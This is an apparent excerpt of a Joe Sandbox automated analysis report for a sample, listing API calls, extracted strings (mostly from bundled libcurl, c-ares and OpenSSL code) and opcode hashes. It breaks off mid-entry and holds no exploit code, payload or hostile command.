                                  • Could not set TCP_NODELAY: %s, xrefs: 0044A871
                                  • bind failed with errno %d: %s, xrefs: 0044B080
                                  • cf_socket_open() -> %d, fd=%d, xrefs: 0044A796
                                  • Bind to local port %d failed, trying next, xrefs: 0044AFE5
                                  • @, xrefs: 0044AC42
                                  • cf-socket.c, xrefs: 0044A5CD, 0044A735
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                  • API String ID: 3981526788-2373386790
                                  • Opcode ID: 2d0de426dd7edc379d87a7a772b8ecd63e5c458cdba63ac5d89fe06eb26c798c
                                  • Instruction ID: 5824c343d972532e52f983acaa9197db65a8fd04d6087664e06199d4bac99a57
                                  • Opcode Fuzzy Hash: 2d0de426dd7edc379d87a7a772b8ecd63e5c458cdba63ac5d89fe06eb26c798c
                                  • Instruction Fuzzy Hash: 4762E271648341ABF720CF14C846BABB7E4EF81318F04491EF98897292E779E855CB97

                                  Control-flow Graph: function starting at 0x4D9740 (rendered basic-block graph with executed / not-executed marking; the figure itself is not reproduced here, only its node list was extracted). Within the graph, the block at 0x4D9914 calls RegOpenKeyExA and the block at 0x4D995A calls RegQueryValueExA and RegCloseKey.
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004D9946
                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004D9974
                                  • RegCloseKey.KERNELBASE(?), ref: 004D998B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                  • API String ID: 3677997916-615551945
                                  • Opcode ID: e3e35325ed4ddcce8a69fed66d578d3e72f2bd73031c46f08ce504ba60976454
                                  • Instruction ID: 7e03ef838e170b736cf7c42a57bdf2138b623a0666c2359e46a9965d99b059f9
                                  • Opcode Fuzzy Hash: e3e35325ed4ddcce8a69fed66d578d3e72f2bd73031c46f08ce504ba60976454
                                  • Instruction Fuzzy Hash: C732B4F5904201ABEB51AB22AC52B1B76D4AF45308F08443FF809D6362FB39EE15D75B

                                  Control-flow Graph: function starting at 0x448B50 (rendered basic-block graph with executed / not-executed marking; the figure itself is not reproduced here, only its node list was extracted). Within the graph, the block at 0x448C1F calls connect and the block at 0x448CD9 calls SleepEx.
                                  APIs
                                  • connect.WS2_32(?,?,00000001), ref: 00448C30
                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00448CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: Sleepconnect
                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                  • API String ID: 238548546-879669977
                                  • Opcode ID: d36ce63ca1521512f969632d5e807aacc249884770345d372758310bf9f53e9d
                                  • Instruction ID: e873f19083064af940b15e11080c1195d58fa31cea120f5f0436fabcdc1d158a
                                  • Opcode Fuzzy Hash: d36ce63ca1521512f969632d5e807aacc249884770345d372758310bf9f53e9d
                                  • Instruction Fuzzy Hash: 2DB1BF70604746AFF710CF24C985BABB7E0AF41318F14892EE8598B3D2DB78E859C765

                                  Control-flow Graph

                                  • Graph rendering not reproduced: function 412f17-4131d6, with calls to RegOpenKeyExA (412f91, 413010), RegEnumKeyExA (41315c), RegQueryValueExA (413089) and RegCloseKey (41313b)
                                  Similarity
                                  • API ID: EnumOpen
                                  • String ID: d
                                  • API String ID: 3231578192-2564639436
                                  • Opcode ID: c6f3c7d7ea0167951e710417f2e437d2cfce836915a936b37e57aa28f9842611
                                  • Instruction ID: bf0bf0cadb37a7a3667a311f9187fc9d3f4e7699200ab9618772027e47d37a8c
                                  • Opcode Fuzzy Hash: c6f3c7d7ea0167951e710417f2e437d2cfce836915a936b37e57aa28f9842611
                                  • Instruction Fuzzy Hash: 4771B4B49043199FDB10EF69C58479EBBF0FF84308F10899DE99897311E7749A888F92

                                  Control-flow Graph

                                  • Graph rendering not reproduced: function 4176a0-417762, with a call to send (4176e6)
                                  APIs
                                  • send.WS2_32(multi.c,?,?,?,N=A,00000000,?,?,004207BF), ref: 004176EB
                                  Similarity
                                  • API ID: send
                                  • String ID: LIMIT %s:%d %s reached memlimit$N=A$SEND %s:%d send(%lu) = %ld$multi.c$send
                                  • API String ID: 2809346765-1082366280
                                  • Opcode ID: 71891ebab00c7d27c5863d1408e4b4af92dd444a8825f124cc6a6f27c372f4bd
                                  • Instruction ID: 2859b5521f88f631887c789da6c88d03383ca0d97583ed5088eed1826f57b354
                                  • Opcode Fuzzy Hash: 71891ebab00c7d27c5863d1408e4b4af92dd444a8825f124cc6a6f27c372f4bd
                                  • Instruction Fuzzy Hash: 1A113AB570E3087BD1209B15AC95E773B6CDFC3B2CF08095AF90853382E969AC41C6B2

                                  Control-flow Graph

                                  • Graph rendering not reproduced: function 449290-449470, with calls to WSAIoctl (449335) and setsockopt (449371)
                                  APIs
                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0044935D
                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00449388
                                  Similarity
                                  • API ID: Ioctlsetsockopt
                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                  • API String ID: 1903391676-2691795271
                                  • Opcode ID: 67ac4a5690ea321fce241bf44a84cfe87ccc61283c2bbf71f4db90dfc325b211
                                  • Instruction ID: f7bc93eda2727c5b893867165aebd39bd0679658d745d0591ac0183912b94510
                                  • Opcode Fuzzy Hash: 67ac4a5690ea321fce241bf44a84cfe87ccc61283c2bbf71f4db90dfc325b211
                                  • Instruction Fuzzy Hash: 8A51CE70A04305ABE714DF24C881BABB7A5FF89318F14852AFD488B382E734ED91C795

                                  Control-flow Graph

                                  • Graph rendering not reproduced: function 417770-417832, with a call to recv (4177b6)
                                  Similarity
                                  • API ID: recv
                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                  • API String ID: 1507349165-640788491
                                  • Opcode ID: 489d97ba2fe1425c5452e5a5e22dc51008cf321a9d3c5c26e0f29c33b6cfde3b
                                  • Instruction ID: 8e048736b42c23a4e98b1a5a9c7807553e5bf362fb846c105db06686e63f5b25
                                  • Opcode Fuzzy Hash: 489d97ba2fe1425c5452e5a5e22dc51008cf321a9d3c5c26e0f29c33b6cfde3b
                                  • Instruction Fuzzy Hash: E7113DB570A3087BD1209B11AC59E773B6CDFC7B6CF080959B904633C2D965AC41C6F6

                                  Control-flow Graph

                                  • Graph rendering not reproduced: function 4175e0-417699, with a call to socket (417607)
                                  Similarity
                                  • API ID: socket
                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                  • API String ID: 98920635-842387772
                                  • Opcode ID: ecd4cb7966bf6f9eb62b0cb7577edd2398122df92001c3d1bd32af880c658b2e
                                  • Instruction ID: aef0ef62b70de71892fbd4ca49846b32a5041aa7438d615b44f16e3d85addb01
                                  • Opcode Fuzzy Hash: ecd4cb7966bf6f9eb62b0cb7577edd2398122df92001c3d1bd32af880c658b2e
                                  • Instruction Fuzzy Hash: C8116F7274A31167DA105B69AC16FEB3B98DFC3738F480565F504932E2D6258C91C3F1

                                  Control-flow Graph

                                  • Graph rendering not reproduced: function 4daa30-4daf1f, with calls to socket (4dab96), ioctlsocket (4dabd0), setsockopt (4dad0a) and connect (4dada0)
                                  APIs
                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 004DAB9B
                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004DABE3
                                  • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 004DAD20
                                  Similarity
                                  • API ID: ioctlsocketsetsockoptsocket
                                  • String ID:
                                  • API String ID: 2067140946-0
                                  • Opcode ID: 2a9fd10e7e1d7053f369c1e9f618d4691a3a6b351cdf2394b9538c765782960a
                                  • Instruction ID: 897f8f8675c654efb20f9dd06bc6b097dde9d5bc65c756d8b09f1f82ff029cd5
                                  • Opcode Fuzzy Hash: 2a9fd10e7e1d7053f369c1e9f618d4691a3a6b351cdf2394b9538c765782960a
                                  • Instruction Fuzzy Hash: F9E1CE706003019BEB20CF24C894B6B77A5EF85314F044A2FF9998B391D779D965CB97

                                  Control-flow Graph

                                  • Graph rendering not reproduced: function 798e90-798f5e (with an out-of-line block range 8e99b0-8e9a72), with a call to _open in the entry block (798e90)
                                  Similarity
                                  • API ID: _open
                                  • String ID: terminated$@
                                  • API String ID: 4183159743-3016906910
                                  • Opcode ID: 7f2194f10b087f401a74a47be7565f147c5de06e3767948f1cac1b393586503a
                                  • Instruction ID: f779777fb459f403b4b9913e93c13422d32521ffba580b45100b0ddd84cb1eab
                                  • Opcode Fuzzy Hash: 7f2194f10b087f401a74a47be7565f147c5de06e3767948f1cac1b393586503a
                                  • Instruction Fuzzy Hash: 1B4149B09083059ECB50EF79D48476ABAE0FF4A318F008A2DE898D7340EB78D9458B56

                                  Control-flow Graph (function at 44a150, calls getsockname; rendered graph and its Executed / Not Executed legend not recoverable from the page)
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 0044A1C7
                                  Strings
                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0044A23B
                                  • getsockname() failed with errno %d: %s, xrefs: 0044A1F0
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                  • API String ID: 3358416759-2605427207
                                  • Opcode ID: 3f984b4abd60a77e90c503b469f42af5abc3c9aafe406727fb91cfa5e5f1c230
                                  • Instruction ID: 8adcfc45658d318804e91c0d150873e3b558a40d4b45a36c2b71bf18e712b622
                                  • Opcode Fuzzy Hash: 3f984b4abd60a77e90c503b469f42af5abc3c9aafe406727fb91cfa5e5f1c230
                                  • Instruction Fuzzy Hash: F821F831948280BAF7259B19EC43FE773ACEF81328F000655F99853152FB36698686E6

                                  Control-flow Graph (function at 42d5e0, calls WSAStartup; rendered graph and its Executed / Not Executed legend not recoverable from the page)
                                  APIs
                                  • WSAStartup.WS2_32(00000202), ref: 0042D65B
                                  Strings
                                  Similarity
                                  • API ID: Startup
                                  • String ID: if_nametoindex$iphlpapi.dll
                                  • API String ID: 724789610-3097795196
                                  • Opcode ID: 0f07dbb0ee7818d351a919a5d0ce03ae0fec7a39d06f78de8fa8b2bd4647a1f9
                                  • Instruction ID: f6a47c6d5f13177c1fdbb3f3487dd85e921ac39b9e5a88031d721c7122200ddf
                                  • Opcode Fuzzy Hash: 0f07dbb0ee7818d351a919a5d0ce03ae0fec7a39d06f78de8fa8b2bd4647a1f9
                                  • Instruction Fuzzy Hash: 7B012BD0F4234156FB11AB38BD1736735946B16304FC808A9D888823D2FB6DC589C197

                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: CloseEvent
                                  • String ID: multi.c
                                  • API String ID: 2624557715-214371023
                                  • Opcode ID: c0ec7547a8d1acdcdf94f5163d7addb1b1271dcc2e4b22287fdd62a61a1a6446
                                  • Instruction ID: ed3e8bfcaf3e99f243055226172b5601378cb2a2df32588d90a38dc82a4fd879
                                  • Opcode Fuzzy Hash: c0ec7547a8d1acdcdf94f5163d7addb1b1271dcc2e4b22287fdd62a61a1a6446
                                  • Instruction Fuzzy Hash: 7951C5B59043005BEB10BA21AC41BE736A46F5431CF08453AE98D9A253FB3DA54EC79B

                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: closesocket
                                  • String ID: FD %s:%d sclose(%d)
                                  • API String ID: 2781271927-3116021458
                                  • Opcode ID: 706703c43da841dcfe3fdb938cd4c52ab7d7e8a36d0d0019244d4c6aff3c25f6
                                  • Instruction ID: 8fae34c6b039f6703778228869e651ca655ad3185cdd977ad21e5805bd091aa5
                                  • Opcode Fuzzy Hash: 706703c43da841dcfe3fdb938cd4c52ab7d7e8a36d0d0019244d4c6aff3c25f6
                                  • Instruction Fuzzy Hash: F9D05E32A092216B85306959AC48C9B7BA8DEC6F60B090CA9F94467305E6349C4183E6

                                  APIs
                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,004DB29E,?,00000000,?,?), ref: 004DB0BA
                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,004C3C41,00000000), ref: 004DB0C1
                                  Similarity
                                  • API ID: ErrorLastconnect
                                  • String ID:
                                  • API String ID: 374722065-0
                                  • Opcode ID: 4a07cd8d4e6953fc7e5dca96ee3601b5a257217f5d35f2a33268c77675d328ca
                                  • Instruction ID: 80a321a6987ec9a0477c41c5e66d5f794d5cff064fef365569db83d2d880e5a1
                                  • Opcode Fuzzy Hash: 4a07cd8d4e6953fc7e5dca96ee3601b5a257217f5d35f2a33268c77675d328ca
                                  • Instruction Fuzzy Hash: E501F936304200DBCA215A248854B67B3A5FF4C364F054B5BE578933D0D72AED004796

                                  APIs
                                  • gethostname.WS2_32(00000000,00000040), ref: 004C4AA5
                                  Similarity
                                  • API ID: gethostname
                                  • String ID:
                                  • API String ID: 144339138-0
                                  • Opcode ID: de90da787216802b9988f08679aaf86464d4b10780147239016afb4f5b883a5b
                                  • Instruction ID: 1f207bc0dcbba8abb511848a082aad3478840cc60fbaea32810b07d3104c7300
                                  • Opcode Fuzzy Hash: de90da787216802b9988f08679aaf86464d4b10780147239016afb4f5b883a5b
                                  • Instruction Fuzzy Hash: 1B51C3B86047019BE7B09B25DE59B2376D4AF81319F14083EE98A867D1F77DEC44C70A

                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 004DAFD0
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: 4ed6c873142418b1c762ec7cb65d5bb419db187170a439d93c0dff0a7770d0d5
                                  • Instruction ID: 03ae9016a018365aed001b04820135a889b11364eb9943af6657d7a42b698af2
                                  • Opcode Fuzzy Hash: 4ed6c873142418b1c762ec7cb65d5bb419db187170a439d93c0dff0a7770d0d5
                                  • Instruction Fuzzy Hash: 82119670908785D5EB268F18D4027E6B3F4EFD0328F10961EE5D942250F7365AC68BC2

                                  APIs
                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 004DA97E
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: fd1ac82c767c366b9bf8590e32f7b952030bd7bfe85c52ded32e8c537534e88c
                                  • Instruction ID: 96560bb4aef07a554038527497c9f0c29a48bfdbf2de876b424d7c78047b4828
                                  • Opcode Fuzzy Hash: fd1ac82c767c366b9bf8590e32f7b952030bd7bfe85c52ded32e8c537534e88c
                                  • Instruction Fuzzy Hash: 300162B6B01710AFC6148F25DC55B5ABBA5EF84720F0A865AFA982B361C331AC158BD1

                                  APIs
                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,004C712E,?,?,?,00001001,00000000), ref: 004DA90D
                                  Similarity
                                  • API ID: recvfrom
                                  • String ID:
                                  • API String ID: 846543921-0
                                  • Opcode ID: 9a2e4f6cef33ece009b1bcfcb69f4cb4e3546be8a99735794da4aaf591301f70
                                  • Instruction ID: 2ebe660bc8e02fcd4f85b80bf4925036d356f83efc13254ec0cd9baf820bbfdc
                                  • Opcode Fuzzy Hash: 9a2e4f6cef33ece009b1bcfcb69f4cb4e3546be8a99735794da4aaf591301f70
                                  • Instruction Fuzzy Hash: 14F06DB5208308AFD2209E01DC58D7BBBEDEFC9754F05895EF948133118270AE10CAB6
                                  APIs
                                  • socket.WS2_32(?,004DB280,00000000,-00000001,00000000,004DB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 004DAF67
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID:
                                  • API String ID: 98920635-0
                                  • Opcode ID: c7a8a976278ca0bb299823ca6c91cc29960429a962ceed5fb7c343c236500ccb
                                  • Instruction ID: d232b7aa185bc254f303e65e818e26a3586f9b2dc4fab8f9ae90c9f350c6eab8
                                  • Opcode Fuzzy Hash: c7a8a976278ca0bb299823ca6c91cc29960429a962ceed5fb7c343c236500ccb
                                  • Instruction Fuzzy Hash: C2E0E5B6A052216BD554DB18E8549ABF369EFC4B10F094A4EB85457304C334AC5087E6
                                  APIs
                                  • closesocket.WS2_32(?,004D9422,?,?,?,?,?,?,?,?,?,?,?,w3L,008EC880,00000000), ref: 004DB04D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: 1e8a2bc8b0d925e0a2fd04645f5a6be2893f12af34637f67f0fa4a90aab552ed
                                  • Instruction ID: 100256a1832854d1b1d171f32d03be59da43179f861513f61220d28018020fda
                                  • Opcode Fuzzy Hash: 1e8a2bc8b0d925e0a2fd04645f5a6be2893f12af34637f67f0fa4a90aab552ed
                                  • Instruction Fuzzy Hash: BAD0C23430020197CA248A14C894A5B766BBFD1710FA9CF6DE02C4A355CB3FCC438685
                                  APIs
                                  • ioctlsocket.WS2_32(?,8004667E,?,?,0044AF56,?,00000001), ref: 004767FC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  • Opcode ID: 6a2560735acf142c8d90d5bbfd73ca91336b9c5081e2866fd315a1296f4c04e2
                                  • Instruction ID: 2c403e2d6a0cdf6dc2de0a1d303b2a4452d207a0fd9d52673b7443b6c3eaab71
                                  • Opcode Fuzzy Hash: 6a2560735acf142c8d90d5bbfd73ca91336b9c5081e2866fd315a1296f4c04e2
                                  • Instruction Fuzzy Hash: 44C012F1218101AFC6088714D455B2F76D9DB44355F01581CB04691180EA305990CB16
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 783cace35a826843690140fcefc91d70b6cdb5c327ca01ddde281dbea15973e3
                                  • Instruction ID: 6b8cb3a3b3ed8b0cacb5321cfd80ed5875f2309e04b85a08eb140644a15418a0
                                  • Opcode Fuzzy Hash: 783cace35a826843690140fcefc91d70b6cdb5c327ca01ddde281dbea15973e3
                                  • Instruction Fuzzy Hash: E831B6B49093099BCB40EFB8C5896AEBBF0FF45344F008869E894E7341E7349A84CF52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                  • API String ID: 0-1371176463
                                  • Opcode ID: 68924858a31a004f56337d2780809e459e9dd80d4fc119f48b3d696a972e469c
                                  • Instruction ID: 4cd2032a2f7219873563a23ca65f84f7971f0ea9ea3e28fe9307c3ce7033b131
                                  • Opcode Fuzzy Hash: 68924858a31a004f56337d2780809e459e9dd80d4fc119f48b3d696a972e469c
                                  • Instruction Fuzzy Hash: E7B23A71A04301BBD7209A25AD42B2B77E1AF45305F08492FFC8996393E7BDEC48D75A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $d$nil)
                                  • API String ID: 0-394766432
                                  • Opcode ID: cd2eb0aa0d74d0151f1a277ce0a73f7742448e39d1f5d22fafac1ce5b1e607ff
                                  • Instruction ID: a3c9ace5daa1315fcef868f8b0b67a9ac52536dd14311ce4efaba7fa2f9f9806
                                  • Opcode Fuzzy Hash: cd2eb0aa0d74d0151f1a277ce0a73f7742448e39d1f5d22fafac1ce5b1e607ff
                                  • Instruction Fuzzy Hash: 09136870608741CFDB20CF28D18462ABBE1BFCA714F644A2DE9959B361D779EC45CB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                  • API String ID: 0-122532811
                                  • Opcode ID: ac5333c4023719319b7b8afc49c477c1feb719997c5317c20b8814d2dcb7be4b
                                  • Instruction ID: f975825e9001d3c089fc2606226962efcc076cf8bf04b1b64c5dc7a147d8dcac
                                  • Opcode Fuzzy Hash: ac5333c4023719319b7b8afc49c477c1feb719997c5317c20b8814d2dcb7be4b
                                  • Instruction Fuzzy Hash: 25420771B08710AFD708DE28DC81B6BB6E6FFC8704F44892DF54D97291E779A8148B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                  • API String ID: 0-3977460686
                                  • Opcode ID: d13af15e186fdd2009a29a22b5b5ebc2a50557992abf6bcb672bac7cbb7dc5f0
                                  • Instruction ID: c9361c5b3587678ee4a93eab29282af2a889c3b8adaff5941af7233173b5bc9c
                                  • Opcode Fuzzy Hash: d13af15e186fdd2009a29a22b5b5ebc2a50557992abf6bcb672bac7cbb7dc5f0
                                  • Instruction Fuzzy Hash: 233238B1B043214BC724AE28BC4131B77D5EBD5324F85472FE9A58B3D1E63CD9418B8A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                  • API String ID: 0-1914377741
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                  • API String ID: 0-2058201250
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                  • API String ID: 0-3476178709
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                  • API String ID: 0-2550110336
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$;$?$?$xn--$xn--
                                  • API String ID: 0-543057197
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: default$login$macdef$machine$netrc.c$password
                                  • API String ID: 0-1043775505
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                  • API String ID: 0-4201740241
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                  • API String ID: 0-2839762339
                                  Strings
                                  Memory Dump Source
